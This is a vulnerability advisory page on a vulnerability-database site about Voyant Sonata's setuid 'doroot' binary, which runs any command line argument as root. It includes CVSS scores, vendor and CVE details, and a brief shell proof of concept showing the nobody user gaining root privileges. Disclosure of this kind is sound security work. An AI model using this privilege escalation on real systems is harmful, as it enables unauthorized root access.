Voyant Sonata doroot command vulnerability

2018.09.25
Risk: Medium
Local: Yes
Remote: No
CWE: N/A


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Title: Voyant Sonata doroot command vulnerability Author: Larry W. Cashdollar, @_larry0 Date: 2000-11-30 CVE-ID:[CVE-2001-0176] Download Site: http://www.voyanttechnology.com/ Vendor: Voyant Technologies. Vendor Notified: 2000-11-30 Vendor Contact: vulnhelp@securityfocus.com Advisory: http://www.vapid.dhs.org/advisories/voyant_technologies_sonata_vulnerabilities.html Description: Sonata is a teleconfrencing solution developed by Voyant Technologies. This advisory concerns the Sonata application server and bridge componet of the Sonata package. The application server is an Ultra Sparc 5 running Solaris 2.x as required by Voyant technologies. The bridge is an IBM PC running OS/2 Warp. These hosts are usually built in house by Voyant personnel and installed at customer locations by a field engineer. Vulnerability: The setuid binary doroot does exactly what it says. It executes its command line argument as root. This is really silly and I dont know why it would need to exist. Export: JSON TEXT XML Exploit Code: $ cd /opt/TK/tk4.1/library/demos $ id uid=60001(nobody) gid=60001(nobody) $ ./doroot id uid=60001(nobody) gid=60001(nobody) euid=0(root) $ ls -l doroot rwsr-xr-x 1 root other 6224 Mar 12 1999 doroot

References:

http://www.vapidlabs.com/advisory.php?v=43


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top